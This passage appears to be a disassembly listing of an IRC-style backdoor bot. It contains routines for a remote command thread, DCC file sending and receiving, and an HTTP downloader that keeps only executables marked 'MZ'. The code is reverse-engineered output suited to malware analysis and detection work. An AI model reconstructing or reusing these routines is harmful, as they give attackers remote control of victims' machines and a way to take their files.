mov eax, [ebp+var_72C]
inc eax
mov [ebp+var_4], eax
jmp short loc_401CCD
; ---------------------------------------------------------------------------
loc_401CC6: ; CODE XREF: sub_401981+337�j
mov [ebp+var_4], 200h
loc_401CCD: ; CODE XREF: sub_401981+343�j
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 0
lea eax, [ebp+var_31C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_204]
push eax
push ds:dword_41DEF4
call ds:dword_417088 ; ReadFile
test eax, eax
jnz short loc_401D08
jmp short loc_401D22
; ---------------------------------------------------------------------------
loc_401D08: ; CODE XREF: sub_401981+383�j
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_510]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401D22: ; CODE XREF: sub_401981+238�j
; sub_401981+291�j ...
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
locret_401D35: ; CODE XREF: sub_401981+67�j
; sub_401981+BB�j ...
leave
retn 4
sub_401981 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D39 proc near ; CODE XREF: sub_401D6E+AF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push [ebp+arg_0]
push ds:dword_41DEF0
call ds:dword_417068 ; WriteFile
test eax, eax
jnz short loc_401D69
xor eax, eax
jmp short locret_401D6C
; ---------------------------------------------------------------------------
loc_401D69: ; CODE XREF: sub_401D39+2A�j
push 1
pop eax
locret_401D6C: ; CODE XREF: sub_401D39+2E�j
leave
retn
sub_401D39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D6E proc near ; CODE XREF: sub_40A9CF+14A0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_401DA6
cmp [ebp+arg_4], 0
jnz short loc_401D8B
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401D8B: ; CODE XREF: sub_401D6E+16�j
push 0
push 0
push 0
push [ebp+arg_4]
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401DA6: ; CODE XREF: sub_401D6E+10�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_401DBC
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401DBC: ; CODE XREF: sub_401D6E+4A�j
cmp [ebp+arg_4], 0
jz short loc_401DD9
push 200h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
loc_401DD9: ; CODE XREF: sub_401D6E+52�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_405F67
pop ecx
pop ecx
push offset aRemoteCmdThrea ; "Remote cmd thread"
push 1
push [ebp+var_4]
push offset sub_401981
call sub_4095A4
add esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_401E0B
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401E0B: ; CODE XREF: sub_401D6E+99�j
push offset asc_418214 ; "\r\n"
push [ebp+arg_4]
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push [ebp+arg_4]
call sub_401D39
pop ecx
test eax, eax
jnz short locret_401E36
push offset aErrorWhileExec ; "Error while executing command."
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
locret_401E36: ; CODE XREF: sub_401D6E+18�j
; sub_401D6E+33�j ...
leave
retn
sub_401D6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E38 proc near ; DATA XREF: sub_4024F3+10B�o
var_614 = qword ptr -614h
var_60C = qword ptr -60Ch
var_604 = dword ptr -604h
var_600 = dword ptr -600h
var_5FC = dword ptr -5FCh
var_5F8 = dword ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = dword ptr -5F0h
var_5EC = dword ptr -5ECh
var_5E8 = dword ptr -5E8h
var_5E4 = dword ptr -5E4h
var_5E0 = dword ptr -5E0h
var_5DC = byte ptr -5DCh
var_5BB = byte ptr -5BBh
var_4B7 = byte ptr -4B7h
var_3B7 = byte ptr -3B7h
var_3AD = byte ptr -3ADh
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 604h
push 3D6h
push [ebp+arg_0]
lea eax, [ebp+var_5E0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_5BB]
push eax
call ds:dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_5BB]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_5E4], eax
cmp [ebp+var_5E4], 0
jnz short loc_401EA3
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EA3: ; CODE XREF: sub_401E38+56�j
push 2710h
push 0
lea eax, [ebp+var_3B7]
push eax
lea eax, [ebp+var_4B7]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_401EEE
push [ebp+var_5E4]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EEE: ; CODE XREF: sub_401E38+95�j
lea eax, [ebp+var_5DC]
push eax
lea eax, [ebp+var_5BB]
push eax
mov eax, [ebp+var_5E0]
push dword ptr [eax]
push offset dword_418280
lea eax, [ebp+var_3AD]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp+var_5E8], eax
and [ebp+var_204], 0
loc_401F2A: ; CODE XREF: sub_401E38:loc_401FD8�j
push 0
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+var_208]
call ds:dword_417248 ; recv
mov [ebp+var_5F0], eax
cmp [ebp+var_5F0], 0
jz short loc_401F5F
cmp [ebp+var_5F0], 200h
jbe short loc_401F61
loc_401F5F: ; CODE XREF: sub_401E38+119�j
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401F61: ; CODE XREF: sub_401E38+125�j
mov eax, [ebp+var_204]
add eax, [ebp+var_5F0]
mov [ebp+var_204], eax
push [ebp+var_204]
call ds:dword_41724C ; htonl
mov [ebp+var_5F4], eax
push 4
lea eax, [ebp+var_5F4]
push eax
push [ebp+var_208]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5E4]
push [ebp+var_5F0]
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B7C ; fwrite
add esp, 10h
cmp [ebp+var_5F0], 200h
jnb short loc_401FC7
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401FC7: ; CODE XREF: sub_401E38+18B�j
mov eax, [ebp+var_5E0]
cmp dword ptr [eax+4], 0
jz short loc_401FD8
jmp loc_4020BC
; ---------------------------------------------------------------------------
loc_401FD8: ; CODE XREF: sub_401E38+199�j
jmp loc_401F2A
; ---------------------------------------------------------------------------
loc_401FDD: ; CODE XREF: sub_401E38:loc_401F5F�j
; sub_401E38+18D�j
push [ebp+var_5E4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_5EC], eax
call sub_416B64 ; clock
cmp [ebp+var_5E8], eax
jnz short loc_402008
call sub_416B64 ; clock
dec eax
mov [ebp+var_5E8], eax
loc_402008: ; CODE XREF: sub_401E38+1C2�j
mov eax, [ebp+var_5EC]
cdq
mov ecx, 400h
idiv ecx
mov [ebp+var_5F8], eax
fild [ebp+var_5F8]
fstp [ebp+var_5FC]
call sub_416B64 ; clock
sub eax, [ebp+var_5E8]
mov [ebp+var_600], eax
fild [ebp+var_600]
fdiv ds:flt_417270
fdivr [ebp+var_5FC]
push ecx
push ecx
fstp [esp+60Ch+var_60C]
call sub_416B64 ; clock
sub eax, [ebp+var_5E8]
mov [ebp+var_604], eax
fild [ebp+var_604]
fdiv ds:flt_417270
push ecx
push ecx
fstp [esp+614h+var_614]
lea eax, [ebp+var_5DC]
push eax
lea eax, [ebp+var_5BB]
push eax
push offset dword_418234
lea eax, [ebp+var_3AD]
push eax
call sub_40D53F
add esp, 20h
loc_402094: ; CODE XREF: sub_401E38:loc_4020BC�j
push [ebp+var_5E4]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_208]
call sub_40538D
pop ecx
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4020BE
; ---------------------------------------------------------------------------
loc_4020BC: ; CODE XREF: sub_401E38+19B�j
jmp short loc_402094
; ---------------------------------------------------------------------------
locret_4020BE: ; CODE XREF: sub_401E38+66�j
; sub_401E38+B1�j ...
leave
retn 4
sub_401E38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020C2 proc near ; DATA XREF: sub_40260D+7C�o
var_A2C = qword ptr -0A2Ch
var_A24 = qword ptr -0A24h
var_A1C = dword ptr -0A1Ch
var_A18 = dword ptr -0A18h
var_A14 = dword ptr -0A14h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = byte ptr -0A04h
var_9FC = dword ptr -9FCh
var_9F8 = dword ptr -9F8h
var_9F4 = dword ptr -9F4h
var_9F0 = byte ptr -9F0h
var_8EC = dword ptr -8ECh
var_8E8 = dword ptr -8E8h
var_8E4 = dword ptr -8E4h
var_8E0 = byte ptr -8E0h
var_8BF = byte ptr -8BFh
var_8BE = byte ptr -8BEh
var_7BB = byte ptr -7BBh
var_618 = dword ptr -618h
var_614 = byte ptr -614h
var_210 = byte ptr -210h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A1Ch
push 2CCh
push [ebp+arg_0]
lea eax, [ebp+var_8E4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_8BF]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_9F8], eax
jmp short loc_40210D
; ---------------------------------------------------------------------------
loc_402100: ; CODE XREF: sub_4020C2:loc_40215E�j
mov eax, [ebp+var_9F8]
dec eax
mov [ebp+var_9F8], eax
loc_40210D: ; CODE XREF: sub_4020C2+3C�j
cmp [ebp+var_9F8], 0
jnz short loc_40212D
lea eax, [ebp+var_8BF]
push eax
lea eax, [ebp+var_9F0]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40212D: ; CODE XREF: sub_4020C2+52�j
mov eax, [ebp+var_9F8]
movsx eax, [ebp+eax+var_8BF]
cmp eax, 5Ch
jnz short loc_40215E
mov eax, [ebp+var_9F8]
lea eax, [ebp+eax+var_8BE]
push eax
lea eax, [ebp+var_9F0]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40215E: ; CODE XREF: sub_4020C2+7C�j
jmp short loc_402100
; ---------------------------------------------------------------------------
loc_402160: ; CODE XREF: sub_4020C2+69�j
; sub_4020C2+9A�j
mov [ebp+var_8E8], 10h
lea eax, [ebp+var_8E8]
push eax
lea eax, [ebp+var_10]
push eax
call sub_40CF25
push eax
call ds:dword_417240 ; getsockname
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_614]
push eax
push [ebp+var_8E8]
lea eax, [ebp+var_10]
push eax
call ds:dword_41DF58 ; getnameinfo
test eax, eax
jz short loc_4021BA
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_4021BA: ; CODE XREF: sub_4020C2+E3�j
push 0Ah
lea eax, [ebp+var_A04]
push eax
push 1388h
push 400h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
lea eax, [ebp+var_A04]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_9FC], eax
cmp [ebp+var_9FC], 0
jnz short loc_40220F
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40220F: ; CODE XREF: sub_4020C2+138�j
push offset aRb ; "rb"
lea eax, [ebp+var_8BF]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8EC], eax
cmp [ebp+var_8EC], 0
jnz short loc_402250
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_402250: ; CODE XREF: sub_4020C2+16D�j
push 2
push 0
push [ebp+var_8EC]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_8EC]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_A08], eax
push 0
push 0
push [ebp+var_8EC]
call sub_416B96 ; fseek
add esp, 0Ch
lea eax, [ebp+var_614]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset aDccSendSS ; "DCC Send %s (%s)"
lea eax, [ebp+var_8E0]
push eax
call sub_40D420
add esp, 10h
push [ebp+var_A08]
lea eax, [ebp+var_A04]
push eax
lea eax, [ebp+var_614]
push eax
call ds:dword_417244 ; inet_addr
push eax
call ds:dword_41724C ; htonl
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_418348
lea eax, [ebp+var_8E0]
push eax
call sub_40D4AB
add esp, 18h
push 0EA60h
push [ebp+var_9FC]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_618], eax
cmp [ebp+var_618], 0
jz short loc_40230F
cmp [ebp+var_618], 0FFFFFFFFh
jnz short loc_40233A
loc_40230F: ; CODE XREF: sub_4020C2+242�j
push [ebp+var_8EC]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40233A: ; CODE XREF: sub_4020C2+24B�j
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
mov eax, [ebp+var_8E4]
push dword ptr [eax]
push offset dword_418320
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp+var_9F4], eax
loc_40236F: ; CODE XREF: sub_4020C2:loc_40240D�j
push [ebp+var_8EC]
push 200h
push 1
lea eax, [ebp+var_210]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_A0C], eax
cmp [ebp+var_A0C], 0
jz short loc_4023A6
cmp [ebp+var_A0C], 200h
jbe short loc_4023A8
loc_4023A6: ; CODE XREF: sub_4020C2+2D6�j
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023A8: ; CODE XREF: sub_4020C2+2E2�j
push [ebp+var_A0C]
lea eax, [ebp+var_210]
push eax
push [ebp+var_618]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4023EE
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_4182F4
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 10h
jmp loc_4024ED
; ---------------------------------------------------------------------------
loc_4023EE: ; CODE XREF: sub_4020C2+303�j
cmp [ebp+var_A0C], 200h
jnb short loc_4023FC
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023FC: ; CODE XREF: sub_4020C2+336�j
mov eax, [ebp+var_8E4]
cmp dword ptr [eax+4], 0
jz short loc_40240D
jmp loc_4024EB
; ---------------------------------------------------------------------------
loc_40240D: ; CODE XREF: sub_4020C2+344�j
jmp loc_40236F
; ---------------------------------------------------------------------------
loc_402412: ; CODE XREF: sub_4020C2:loc_4023A6�j
; sub_4020C2+338�j
call sub_416B64 ; clock
cmp [ebp+var_9F4], eax
jnz short loc_40242B
call sub_416B64 ; clock
dec eax
mov [ebp+var_9F4], eax
loc_40242B: ; CODE XREF: sub_4020C2+35B�j
mov eax, [ebp+var_A08]
cdq
mov ecx, 400h
idiv ecx
mov [ebp+var_A10], eax
fild [ebp+var_A10]
fstp [ebp+var_A14]
call sub_416B64 ; clock
sub eax, [ebp+var_9F4]
mov [ebp+var_A18], eax
fild [ebp+var_A18]
fdiv ds:flt_417270
fdivr [ebp+var_A14]
push ecx
push ecx
fstp [esp+0A24h+var_A24]
call sub_416B64 ; clock
sub eax, [ebp+var_9F4]
mov [ebp+var_A1C], eax
fild [ebp+var_A1C]
fdiv ds:flt_417270
push ecx
push ecx
fstp [esp+0A2Ch+var_A2C]
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_4182B0
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 20h
loc_4024B7: ; CODE XREF: sub_4020C2:loc_4024EB�j
; sub_4020C2:loc_4024ED�j
push [ebp+var_618]
call sub_40538D
pop ecx
push [ebp+var_8EC]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4024EF
; ---------------------------------------------------------------------------
loc_4024EB: ; CODE XREF: sub_4020C2+346�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
loc_4024ED: ; CODE XREF: sub_4020C2+327�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
locret_4024EF: ; CODE XREF: sub_4020C2+F3�j
; sub_4020C2+148�j ...
leave
retn 4
sub_4020C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024F3 proc near ; CODE XREF: sub_40D871+203�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_402511
cmp [ebp+arg_8], 0
jz short loc_402511
cmp [ebp+arg_C], 0
jz short loc_402511
cmp [ebp+arg_10], 0
jnz short loc_402516
loc_402511: ; CODE XREF: sub_4024F3+A�j
; sub_4024F3+10�j ...
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402516: ; CODE XREF: sub_4024F3+1C�j
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_402531
cmp [ebp+var_8], 0FFFFh
jbe short loc_402536
loc_402531: ; CODE XREF: sub_4024F3+33�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402536: ; CODE XREF: sub_4024F3+3C�j
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_402551
cmp [ebp+var_8], 40000000h
jbe short loc_402556
loc_402551: ; CODE XREF: sub_4024F3+53�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402556: ; CODE XREF: sub_4024F3+5C�j
push 3D6h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40256F
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_40256F: ; CODE XREF: sub_4024F3+75�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 100h
push [ebp+arg_C]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 6
push [ebp+arg_10]
mov eax, [ebp+var_4]
add eax, 229h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+22Fh], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 233h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_41837C
push 0
push [ebp+var_4]
push offset sub_401E38
call sub_4095A4
add esp, 18h
locret_40260B: ; CODE XREF: sub_4024F3:loc_402511�j
; sub_4024F3:loc_402531�j ...
leave
retn
sub_4024F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40260D proc near ; CODE XREF: sub_40A9CF+98E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jz short loc_40261D
cmp [ebp+arg_8], 0
jnz short loc_40261F
loc_40261D: ; CODE XREF: sub_40260D+8�j
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_40261F: ; CODE XREF: sub_40260D+E�j
push 2CCh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_402635
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_402635: ; CODE XREF: sub_40260D+24�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4183A0
push 0
push [ebp+var_4]
push offset sub_4020C2
call sub_4095A4
add esp, 18h
locret_402696: ; CODE XREF: sub_40260D:loc_40261D�j
; sub_40260D+26�j
leave
retn
sub_40260D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402698 proc near ; CODE XREF: sub_402A32+5C9�p
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 420h
push 2710h
push 0
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_414], eax
cmp [ebp+var_414], 0
jnz short loc_4026CC
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4026CC: ; CODE XREF: sub_402698+2B�j
push [ebp+arg_8]
push [ebp+arg_10]
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 401h
lea eax, [ebp+var_404]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_4053BF
add esp, 0Ch
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402745
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_402758
loc_402745: ; CODE XREF: sub_402698+A2�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_402758: ; CODE XREF: sub_402698+AB�j
push offset asc_4183EC ; "\r\n\r\n"
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_40278D
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40278D: ; CODE XREF: sub_402698+E0�j
mov eax, [ebp+var_410]
add eax, 4
mov [ebp+var_410], eax
push offset aContentLength ; "Content-Length: "
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_40C], eax
cmp [ebp+var_40C], 0
jz short loc_4027CC
mov eax, [ebp+var_40C]
cmp eax, [ebp+var_410]
jbe short loc_4027DF
loc_4027CC: ; CODE XREF: sub_402698+124�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4027DF: ; CODE XREF: sub_402698+132�j
and [ebp+var_41C], 0
lea eax, [ebp+var_41C]
push eax
push offset aContentLengthU ; "Content-Length: %u\r\n"
push [ebp+var_40C]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_408], eax
cmp [ebp+var_408], 1
jnz short loc_402818
cmp [ebp+var_41C], 0
jnz short loc_40282B
loc_402818: ; CODE XREF: sub_402698+175�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40282B: ; CODE XREF: sub_402698+17E�j
cmp [ebp+arg_1C], 0
jz short loc_40285D
cmp [ebp+var_41C], 2
jb short loc_40284A
mov eax, [ebp+var_410]
movzx eax, word ptr [eax]
cmp eax, 5A4Dh
jz short loc_40285D
loc_40284A: ; CODE XREF: sub_402698+1A0�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40285D: ; CODE XREF: sub_402698+197�j
; sub_402698+1B0�j
cmp [ebp+arg_18], 0
jz short loc_40286E
mov eax, [ebp+arg_18]
mov ecx, [ebp+var_41C]
mov [eax], ecx
loc_40286E: ; CODE XREF: sub_402698+1C9�j
push [ebp+arg_14]
call sub_4167B9
pop ecx
test eax, eax
jz short loc_40288E
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40288E: ; CODE XREF: sub_402698+1E1�j
push offset dword_4182AC
push [ebp+arg_14]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 0
jnz short loc_4028BF
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4028BF: ; CODE XREF: sub_402698+212�j
push [ebp+var_418]
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
push ecx
push 1
push [ebp+var_410]
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
mov eax, [ebp+var_41C]
sub eax, ecx
mov [ebp+var_41C], eax
loc_402910: ; CODE XREF: sub_402698:loc_402A1D�j
cmp [ebp+arg_20], 0
jz short loc_40293F
mov eax, [ebp+arg_20]
cmp dword ptr [eax+4], 0
jz short loc_40293F
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40293F: ; CODE XREF: sub_402698+27C�j
; sub_402698+285�j
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402976
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_40299E
loc_402976: ; CODE XREF: sub_402698+2D3�j
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push [ebp+arg_14]
call ds:dword_4170AC ; DeleteFileA
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40299E: ; CODE XREF: sub_402698+2DC�j
mov eax, [ebp+var_420]
cmp eax, [ebp+var_41C]
jbe short loc_4029C8
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_4029C8: ; CODE XREF: sub_402698+312�j
push [ebp+var_418]
push [ebp+var_420]
push 1
lea eax, [ebp+var_404]
push eax
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_41C]
sub eax, [ebp+var_420]
mov [ebp+var_41C], eax
cmp [ebp+var_41C], 0
jnz short loc_402A1D
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_402A1D: ; CODE XREF: sub_402698+366�j
jmp loc_402910
; ---------------------------------------------------------------------------
locret_402A22: ; CODE XREF: sub_402698+2F�j
; sub_402698+BB�j ...
leave
retn
sub_402698 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A24 proc near ; CODE XREF: sub_402A32+625�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
